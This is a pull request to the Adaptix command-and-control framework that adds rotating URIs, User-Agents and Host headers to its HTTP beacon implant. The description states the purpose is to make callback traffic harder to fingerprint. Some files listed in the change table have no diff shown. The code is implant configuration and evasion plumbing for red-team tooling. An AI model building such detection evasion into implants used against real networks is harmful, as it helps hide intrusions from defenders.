### PR TITLE
Add malleable profile support for HTTP beacon

### DIFF
--- a/AdaptixServer/extenders/beacon_agent/ax_config.axs
+++ b/AdaptixServer/extenders/beacon_agent/ax_config.axs
@@ -440,6 +440,10 @@ function GenerateUI(listeners_type)
 
     /////////////////////////
 
+    let labelRotation = form.create_label("Rotation Mode:");
+    let comboRotation = form.create_combo();
+    comboRotation.addItems(["sequential", "random"]);
+
     let spacer2 = form.create_vspacer();
 
     if(!listeners_type.includes("BeaconDNS")) {
@@ -447,6 +451,8 @@ function GenerateUI(listeners_type)
     }
     if(!listeners_type.includes("BeaconHTTP")) {
         group_proxy.setVisible(false);
+        labelRotation.setVisible(false);
+        comboRotation.setVisible(false);
     }
 
     let layout = form.create_gridlayout();
@@ -468,9 +474,11 @@ function GenerateUI(listeners_type)
     layout.addWidget(textSvcName,         6, 1, 1, 2);
     layout.addWidget(checkSideloading,    7, 0, 1, 1);
     layout.addWidget(sideloadingSelector, 7, 1, 1, 2);
-    layout.addWidget(group_proxy,         8, 0, 1, 3);
-    layout.addWidget(group_dns,           9, 0, 1, 3);
-    layout.addWidget(spacer2,            10, 0, 1, 3);
+    layout.addWidget(labelRotation,       8, 0, 1, 1);
+    layout.addWidget(comboRotation,       8, 1, 1, 2);
+    layout.addWidget(group_proxy,         9, 0, 1, 3);
+    layout.addWidget(group_dns,          10, 0, 1, 3);
+    layout.addWidget(spacer2,            11, 0, 1, 3);
 
     form.connect(comboAgentFormat, "currentTextChanged", function(text) {
         if(text == "Service Exe") {
@@ -513,6 +521,7 @@ function GenerateUI(listeners_type)
     container.put("proxy_port",          spinProxyPort)
     container.put("proxy_username",      textProxyUsername)
     container.put("proxy_password",      textProxyPassword)
+    container.put("rotation_mode",      comboRotation)
 
     let panel = form.create_panel()
     panel.setLayout(layout)

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/AgentConfig.cpp
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/AgentConfig.cpp
@@ -42,12 +42,26 @@ AgentConfig::AgentConfig()
 		this->profile.ports[i]   = (WORD) packer->Unpack32();
 	}
 	this->profile.http_method  = packer->UnpackBytesCopy(&length);
-	this->profile.uri          = packer->UnpackBytesCopy(&length);
+	this->profile.uri_count    = packer->Unpack32();
+	this->profile.uris         = (BYTE**) MemAllocLocal(this->profile.uri_count * sizeof(LPVOID));
+	for (ULONG i = 0; i < this->profile.uri_count; i++) {
+		this->profile.uris[i] = packer->UnpackBytesCopy(&length);
+	}
 	this->profile.parameter    = packer->UnpackBytesCopy(&length);
-	this->profile.user_agent   = packer->UnpackBytesCopy(&length);
+	this->profile.ua_count     = packer->Unpack32();
+	this->profile.user_agents  = (BYTE**) MemAllocLocal(this->profile.ua_count * sizeof(LPVOID));
+	for (ULONG i = 0; i < this->profile.ua_count; i++) {
+		this->profile.user_agents[i] = packer->UnpackBytesCopy(&length);
+	}
 	this->profile.http_headers = packer->UnpackBytesCopy(&length);
 	this->profile.ans_pre_size = packer->Unpack32();
 	this->profile.ans_size     = packer->Unpack32() + this->profile.ans_pre_size;
+	this->profile.hh_count     = packer->Unpack32();
+	this->profile.host_headers = (BYTE**) MemAllocLocal(this->profile.hh_count * sizeof(LPVOID));
+	for (ULONG i = 0; i < this->profile.hh_count; i++) {
+		this->profile.host_headers[i] = packer->UnpackBytesCopy(&length);
+	}
+	this->profile.rotation_mode = (BYTE) packer->Unpack32();
 
 	this->profile.proxy_type     = (BYTE) packer->Unpack32();
 	this->profile.proxy_host     = packer->UnpackBytesCopy(&length);

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/AgentConfig.h
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/AgentConfig.h
@@ -16,12 +16,17 @@ typedef struct {
 	WORD*  ports;
 	BOOL   use_ssl;
 	BYTE*  http_method;
-	BYTE*  uri;
+	ULONG  uri_count;
+	BYTE** uris;
 	BYTE*  parameter;
-	BYTE*  user_agent;
+	ULONG  ua_count;
+	BYTE** user_agents;
 	BYTE*  http_headers;
 	ULONG  ans_pre_size;
 	ULONG  ans_size;
+	ULONG  hh_count;
+	BYTE** host_headers;
+	BYTE   rotation_mode;   // 0=sequential, 1=random
 	BYTE   proxy_type;      // 0=none, 1=http, 2=https
 	BYTE*  proxy_host;
 	WORD   proxy_port;

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorHTTP.h
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorHTTP.h
@@ -16,12 +16,17 @@ typedef struct {
 	WORD*  ports;
 	BOOL   use_ssl;
 	BYTE*  http_method;
-	BYTE*  uri;
+	ULONG  uri_count;
+	BYTE** uris;
 	BYTE*  parameter;
-	BYTE*  user_agent;
+	ULONG  ua_count;
+	BYTE** user_agents;
 	BYTE*  http_headers;
 	ULONG  ans_pre_size;
 	ULONG  ans_size;
+	ULONG  hh_count;
+	BYTE** host_headers;
+	BYTE   rotation_mode;   // 0=sequential, 1=random
 	BYTE   proxy_type;      // 0=none, 1=http, 2=https
 	BYTE*  proxy_host;
 	WORD   proxy_port;
@@ -63,17 +68,24 @@ struct HTTPFUNC {
 
 class ConnectorHTTP
 {
-	CHAR*  user_agent     = NULL;
-	CHAR*  host_header	  = NULL;
-	BOOL   ssl			  = FALSE;
+	ULONG  ua_count       = 0;
+	CHAR** user_agents    = NULL;
+	ULONG  ua_index       = 0;
+	ULONG  hh_count       = 0;
+	CHAR** host_headers   = NULL;
+	ULONG  hh_index       = 0;
+	BOOL   ssl            = FALSE;
 	CHAR*  http_method    = NULL;
 	ULONG  server_count   = 0;
 	CHAR** server_address = NULL;
 	WORD*  server_ports   = 0;
-	CHAR*  uri            = NULL;
+	ULONG  uri_count      = 0;
+	CHAR** uris           = NULL;
+	ULONG  uri_index      = 0;
 	CHAR*  headers        = NULL;
 	ULONG  ans_size       = 0;
 	ULONG  ans_pre_size   = 0;
+	BYTE   rotation_mode  = 0;
 
 	BYTE* recvData = NULL;
 	int   recvSize = 0;

--- a/AdaptixServer/extenders/beacon_listener_http/ax_config.axs
+++ b/AdaptixServer/extenders/beacon_listener_http/ax_config.axs
@@ -23,12 +23,12 @@ function ListenerUI(mode_create)
     comboMethod.addItems(["POST", "GET"]);
     comboMethod.setEnabled(mode_create)
 
-    let labelUri = form.create_label("URI:");
-    let textlineUri = form.create_textline();
-    textlineUri.setPlaceholder("/uri.php");
+    let labelUri = form.create_label("URIs (one per line):");
+    let textUri = form.create_textmulti();
+    textUri.setPlaceholder("/api/v1/status\n/updates/check\n/content/load");
 
-    let labelUserAgent = form.create_label("User-Agent:");
-    let textlineUserAgent = form.create_textline("Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0");
+    let labelUserAgent = form.create_label("User-Agents (one per line):");
+    let textUserAgent = form.create_textmulti("Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0");
 
     let labelHB = form.create_label("Heartbeat Header:");
     let textlineHB = form.create_textline("X-Beacon-Id");
@@ -63,9 +63,9 @@ function ListenerUI(mode_create)
     layoutMain.addWidget(labelMethod,        2, 0, 1, 1);
     layoutMain.addWidget(comboMethod,        2, 1, 1, 2);
     layoutMain.addWidget(labelUri,           3, 0, 1, 1);
-    layoutMain.addWidget(textlineUri,        3, 1, 1, 2);
-    layoutMain.addWidget(labelUserAgent,     4, 0, 1, 1 );
-    layoutMain.addWidget(textlineUserAgent,  4, 1, 1, 2);
+    layoutMain.addWidget(textUri,            3, 1, 1, 2);
+    layoutMain.addWidget(labelUserAgent,     4, 0, 1, 1);
+    layoutMain.addWidget(textUserAgent,      4, 1, 1, 2);
     layoutMain.addWidget(labelHB,            5, 0, 1, 1);
     layoutMain.addWidget(textlineHB,         5, 1, 1, 2);
     layoutMain.addWidget(labelEncryptKey,    6, 0, 1, 1);
@@ -80,8 +80,8 @@ function ListenerUI(mode_create)
     // HTTP HEADERS
     let checkTrust = form.create_check("Trust X-Forwarded-For");
 
-    let labelHostHeader = form.create_label("Host Header:");
-    let textlineHostHeader = form.create_textline();
+    let labelHostHeader = form.create_label("Host Headers (one per line):");
+    let textHostHeader = form.create_textmulti();
 
     let labelRequestHeaders = form.create_label("Request Headers:");
     let textRequestHeaders = form.create_textmulti();
@@ -93,7 +93,7 @@ function ListenerUI(mode_create)
     let layoutHeaders = form.create_gridlayout();
     layoutHeaders.addWidget(checkTrust, 0, 0, 1, 2);
     layoutHeaders.addWidget(labelHostHeader, 1, 0, 1, 1);
-    layoutHeaders.addWidget(textlineHostHeader, 1, 1, 1, 1);
+    layoutHeaders.addWidget(textHostHeader, 1, 1, 1, 1);
     layoutHeaders.addWidget(labelRequestHeaders, 2, 0, 1, 1);
     layoutHeaders.addWidget(textRequestHeaders, 2, 1, 1, 1);
     layoutHeaders.addWidget(labelServerHeaders, 3, 0, 1, 1);
@@ -135,15 +135,15 @@ function ListenerUI(mode_create)
     container.put("port_bind", spinPortBind);
     container.put("callback_addresses", textCallback);
     container.put("http_method", comboMethod);
-    container.put("uri", textlineUri);
-    container.put("user_agent", textlineUserAgent);
+    container.put("uri", textUri);
+    container.put("user_agent", textUserAgent);
     container.put("hb_header", textlineHB);
     container.put("encrypt_key", textlineEncryptKey);
     container.put("ssl", ssl_group);
     container.put("ssl_cert", certSelector);
     container.put("ssl_key", keySelector);
     container.put("x-forwarded-for", checkTrust);
-    container.put("host_header", textlineHostHeader);
+    container.put("host_header", textHostHeader);
     container.put("request_headers", textRequestHeaders);
     container.put("server_headers", textServerHeaders);
     container.put("page-error", textError);

--- a/AdaptixServer/extenders/beacon_listener_http/pl_main.go
+++ b/AdaptixServer/extenders/beacon_listener_http/pl_main.go
@@ -3,7 +3,6 @@ package main
 import (
 	"bytes"
 	"encoding/json"
-	"fmt"
 	"strconv"
 	"strings"
 
@@ -61,9 +60,7 @@ func (p *PluginListener) Create(name string, config string, customData []byte) (
 
 		conf.RequestHeaders = strings.TrimRight(conf.RequestHeaders, " \n\t\r") + "\n"
 		conf.RequestHeaders = strings.ReplaceAll(conf.RequestHeaders, "\n", "\r\n")
-		if len(conf.HostHeader) > 0 {
-			conf.RequestHeaders = fmt.Sprintf("Host: %s\r\n%s", conf.HostHeader, conf.RequestHeaders)
-		}
+		// Host header is handled separately by the agent for rotation support
 
 		conf.ResponseHeaders = make(map[string]string)
 		headerLine := strings.Split(conf.Server_headers, "\n")
@@ -153,9 +150,7 @@ func (l *Listener) Edit(config string) (adaptix.ListenerData, []byte, error) {
 
 	conf.RequestHeaders = strings.TrimRight(conf.RequestHeaders, " \n\t\r") + "\n"
 	conf.RequestHeaders = strings.ReplaceAll(conf.RequestHeaders, "\n", "\r\n")
-	if len(conf.HostHeader) > 0 {
-		conf.RequestHeaders = fmt.Sprintf("Host: %s\r\n%s", conf.HostHeader, conf.RequestHeaders)
-	}
+	// Host header is handled separately by the agent for rotation support
 
 	l.transport.Config.Callback_addresses = conf.Callback_addresses
 	l.transport.Config.UserAgent = conf.UserAgent


### PR DESCRIPTION
## Summary

- **Multiple URIs, User-Agents, and Host Headers with rotation**: the HTTP beacon now supports configuring multiple values for URIs, User-Agents, and Host Headers (one per line in the listener UI). The agent rotates through them on each callback, making traffic patterns less predictable and harder to fingerprint.
- **Rotation modes (sequential / random)**: a new "Rotation Mode" option in the agent build config lets operators choose between round-robin (sequential) and randomized rotation for all rotating fields (servers, URIs, UAs, Host Headers).
- **Active round-robin for servers**: server rotation now happens on every callback (not only on failure), distributing traffic across all configured C2 addresses.

## Changes

| File | Description |
|------|-------------|
| `beacon_agent/ax_config.axs` | Added rotation_mode combo box to agent build UI |
| `beacon_agent/pl_main.go` | Serialize multi-value fields as arrays in profile binary format |
| `beacon_agent/src_beacon/beacon/AgentConfig.h` | Updated ProfileHTTP struct: single fields → arrays with counts |
| `beacon_agent/src_beacon/beacon/AgentConfig.cpp` | Parse array fields from binary profile |
| `beacon_agent/src_beacon/beacon/ConnectorHTTP.h` | Updated class fields to arrays with rotation indices |
| `beacon_agent/src_beacon/beacon/ConnectorHTTP.cpp` | UA/URI/Host Header rotation in SendData(), handle lifecycle management |
| `beacon_listener_http/ax_config.axs` | Changed URI, UserAgent, HostHeader inputs from textline to textmulti |
| `beacon_listener_http/pl_main.go` | Removed server-side Host header injection (agent handles it now) |
| `beacon_listener_http/pl_transport.go` | Multi-value validation in validConfig() and processRequest() |

## Test plan

- [x] `make server-ext` builds successfully
- [x] Create HTTP listener with multiple URIs, UAs, and Host Headers
- [x] Generate agent and confirm successful callbacks
- [x] Verify rotation across URIs, UAs, and servers in listener logs
- [x] Single-value configs (backward compatible usage) still work
- [x] Both sequential and random rotation modes tested